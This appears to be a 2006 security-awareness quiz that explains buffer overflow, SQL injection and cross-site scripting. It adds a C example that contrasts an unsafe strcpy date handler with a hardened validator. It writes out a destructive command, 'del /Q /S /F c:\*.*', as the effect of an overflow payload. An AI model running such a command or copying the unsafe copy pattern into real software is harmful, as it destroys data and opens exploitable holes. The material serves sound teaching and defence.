August 2006
Identifying buffer overflow attack
An attacker enters a long nasty looking string into the date field. The input overwrites parts of the running program and executes commands on the server. What type of attack just took place?
1) SQL Injection attack
2) Buffer Overflow attack
3) Cross Site Scripting attack
The correct answer is 2) Buffer Overflow attack.
In a SQL injection attack, an attacker enters a specially crafted value in an input field that the application uses to construct a dynamic database query. This manipulates the query and reveals more information to the attacker. We discuss the basics of SQL injection in the Learning Center. In June we analyzed how these attacks affect stored procedures too, in the pages of Palisade.
In a buffer overflow attack, the input takes more space than was allocated for the variable. It overflows the allocated buffer and overwrites adjacent memory locations. When the input is carefully crafted, it lets the attacker run commands of his choice. Here’s one such input, courtesy of the Metasploit project. It executes the command:
del /Q /S /F c:\*.*
Read our discussion on the techniques to prevent buffer overflows in the back pages of Palisade.
A cross-site scripting (XSS) attack is aimed at stealing sensitive user information such as session tokens. A common attack method is to send the victim an e-mail containing a link to a valid site with JavaScript embedded in the URL. When the victim clicks the link, the browser executes the script, which retrieves the user’s cookies and mails them to the attacker. XSS was the topic of the April 2005 quiz.
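The date-field scenario from the quiz, as an added example that is not code from the original article or from the Metasploit project: an unbounded copy into a fixed-size buffer beside a hardened version that checks length and format before copying. The "YYYY-MM-DD" format, the function names and the sample inputs are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DATE_LEN 10 /* assumed field format: "YYYY-MM-DD" */

/* Unsafe pattern from the quiz scenario, kept for contrast and never called:
 * strcpy() copies until the NUL byte, so longer input overwrites adjacent memory. */
void store_date_unsafe(const char *input) {
    char date[DATE_LEN + 1];
    strcpy(date, input); /* no length check */
    printf("stored %s\n", date);
}

/* Hardened form: returns 0 and fills out on success, -1 if the input is rejected. */
int store_date_safe(const char *input, char *out, size_t out_size) {
    size_t n = 0;
    if (input == NULL || out == NULL || out_size < DATE_LEN + 1)
        return -1;
    /* Bounded length scan: stops one byte past the longest valid value. */
    while (n <= DATE_LEN && input[n] != '\0')
        n++;
    if (n != DATE_LEN)
        return -1;
    /* Allow-list the format so only digits and '-' reach the buffer. */
    for (size_t i = 0; i < DATE_LEN; i++) {
        if (i == 4 || i == 7) {
            if (input[i] != '-')
                return -1;
        } else if (!isdigit((unsigned char)input[i])) {
            return -1;
        }
    }
    memcpy(out, input, DATE_LEN);
    out[DATE_LEN] = '\0';
    return 0;
}

int main(void) {
    /* Constructed sample inputs: one valid date, one oversized, one malformed. */
    const char *samples[] = { "2006-08-15", "2006-08-15AAAAAAAAAAAAAAAAAAAAAAAA", "2006/08/15" };
    char date[DATE_LEN + 1];
    for (size_t i = 0; i < 3; i++)
        printf("%-36s -> %s\n", samples[i],
               store_date_safe(samples[i], date, sizeof date) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The hardened function rejects oversized input outright instead of truncating it, so a malformed date never reaches later processing in a shortened form.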
by Sangita Pakala.